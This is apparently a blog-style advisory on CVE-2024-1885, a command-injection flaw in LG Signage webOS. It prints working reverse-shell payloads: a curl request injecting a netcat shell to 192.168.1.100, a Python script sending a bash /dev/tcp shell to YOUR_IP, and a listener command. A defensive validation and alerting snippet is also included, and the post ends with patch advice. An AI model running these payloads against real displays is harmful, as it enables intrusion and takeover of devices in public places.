CVE-2024-1885 - Remote Code Execution in LG Signage webOS — What You Need to Know

In early 2024, a critical vulnerability (CVE-2024-1885) was discovered in certain versions of LG Signage digital displays running webOS. This flaw allows attackers on the internet to run their own code on affected devices—without needing any login or special credentials. In simple terms: if you manage digital displays powered by LG webOS, your screens could be remotely hijacked to do anything from displaying unwanted content to joining a botnet.

In this post, we’ll break down what CVE-2024-1885 is, how the exploit works, sample malicious code, and what steps you should take right away.

What Is CVE-2024-1885?

CVE-2024-1885 is a remote code execution (RCE) vulnerability that affects some LG Signage products running webOS. The bug lets attackers send special HTTP requests over the internet or local networks to trick the device's built-in web services and inject their own commands.

Affected Products

- LG digital signage devices running certain versions of webOS 4.x, 5.x, 6.x (check the official LG advisory for the complete list).

Severity: Critical (CVSS score: 9.8/10)

How Does the Exploit Work?

The vulnerable LG webOS system exposes a management interface (usually via a REST API or web admin console) that doesn't fully validate or sanitize user input. Attackers can craft an HTTP request that injects system commands through parameters meant for legitimate operations (like diagnostics or content uploads).

A Simple Exploit Request

Below is a simplified example of how a hacker could use curl (a command-line tool) to exploit the device:

curl -X POST "http://SIGNAGE_IP:PORT/api/upload" \
  -H "Content-Type: application/json" \
  -d '{"filename":"test.jpg", "filepath":"/tmp; nc 192.168.1.100 4444 -e /bin/sh #"}'

What’s Going On?

- The request is sending data to the upload function on the target, but injects ; nc 192.168.1.100 4444 -e /bin/sh # into the file path string.
- The semicolon ; breaks out of the intended file path command and starts a new system command: nc (netcat) will connect to the attacker's computer at 192.168.1.100 on port 4444 and open a remote shell.

With this, the attacker gains full remote control as the webOS system user.
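The injection works because the filepath value reaches a shell unchecked. As an added defensive example (not code from the original post or from LG), the functions below show the two controls that close this class of bug on a service like the upload API above: strict allow-list validation of the filepath parameter, and building the downstream command as an argument vector so no shell ever parses it, plus a small request-body check that flags injection attempts for alerting. The upload root, the converter name and the sample request bodies are assumptions constructed for this example.

```python
import json
import os
import re

# Characters that let a value break out of a shell command; none belong in a file path.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\r]")

# Directory the upload API may write under. Assumed for this example, not an LG path.
UPLOAD_ROOT = "/var/signage/uploads"


def is_safe_filepath(filepath: str, root: str = UPLOAD_ROOT) -> bool:
    """Allow-list check for the 'filepath' parameter: relative, free of shell
    metacharacters, and still inside root after '..' segments are collapsed."""
    if not filepath or filepath.startswith("/") or SHELL_META.search(filepath):
        return False
    candidate = os.path.normpath(os.path.join(root, filepath))
    return candidate.startswith(root + os.sep)


def suspicious_fields(body: str) -> list:
    """Names of string fields in a JSON request body that carry shell
    metacharacters; usable as an alert rule on requests to /api/upload."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return ["<malformed-json>"]
    if not isinstance(data, dict):
        return []
    return [k for k, v in data.items() if isinstance(v, str) and SHELL_META.search(v)]


def convert_argv(filepath: str) -> list:
    """Argument vector for a hypothetical image converter. Hand it to
    subprocess.run() as a list (never shell=True): the path is a single
    argument and is never interpreted by a shell, whatever it contains."""
    if not is_safe_filepath(filepath):
        raise ValueError("rejected filepath")
    return ["img-convert", "--input", os.path.join(UPLOAD_ROOT, filepath)]


if __name__ == "__main__":
    # Constructed request bodies: one benign, one shaped like the injection above.
    benign = '{"filename": "promo.jpg", "filepath": "campaigns/promo.jpg"}'
    hostile = '{"filename": "test.jpg", "filepath": "/tmp; id #"}'
    for body in (benign, hostile):
        print(body, "->", suspicious_fields(body) or "clean")
```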

Here’s a more generic payload in Python that a researcher might use in a test environment:

import requests

target = "http://SIGNAGE_IP:PORT/api/upload"
payload = {
    "filename": "evil.jpg",
    "filepath": "/tmp; bash -i >& /dev/tcp/YOUR_IP/4444 >&1 #"
}
headers = {"Content-Type": "application/json"}
requests.post(target, json=payload, headers=headers)

Adjust SIGNAGE_IP, PORT, and YOUR_IP accordingly. A netcat listener should be waiting on the attacker's side:

nc -lvnp 4444

- All commands run: the device runs the attacker’s code as the webOS system user.
- Widespread reach: these webOS displays are found in schools, airports, offices, stores, and more, and are often managed remotely over open networks.

Official References

- NVD CVE-2024-1885 Entry
- LG Product Security Advisory
- SecurityFocus Listing (generic)

Patch Immediately

LG has delivered firmware updates. Apply the latest update for your display’s webOS version here.

Final Words

CVE-2024-1885 is a perfect example of why even “dumb” devices like display screens aren’t safe from cyber attack. If you manage LG Signage products, take action now to patch, monitor, and restrict access—before your screens are hijacked for something far less innocent than a slideshow.

Timeline

Published on: 02/26/2024 16:27:54 UTC
Last modified on: 02/29/2024 07:15:06 UTC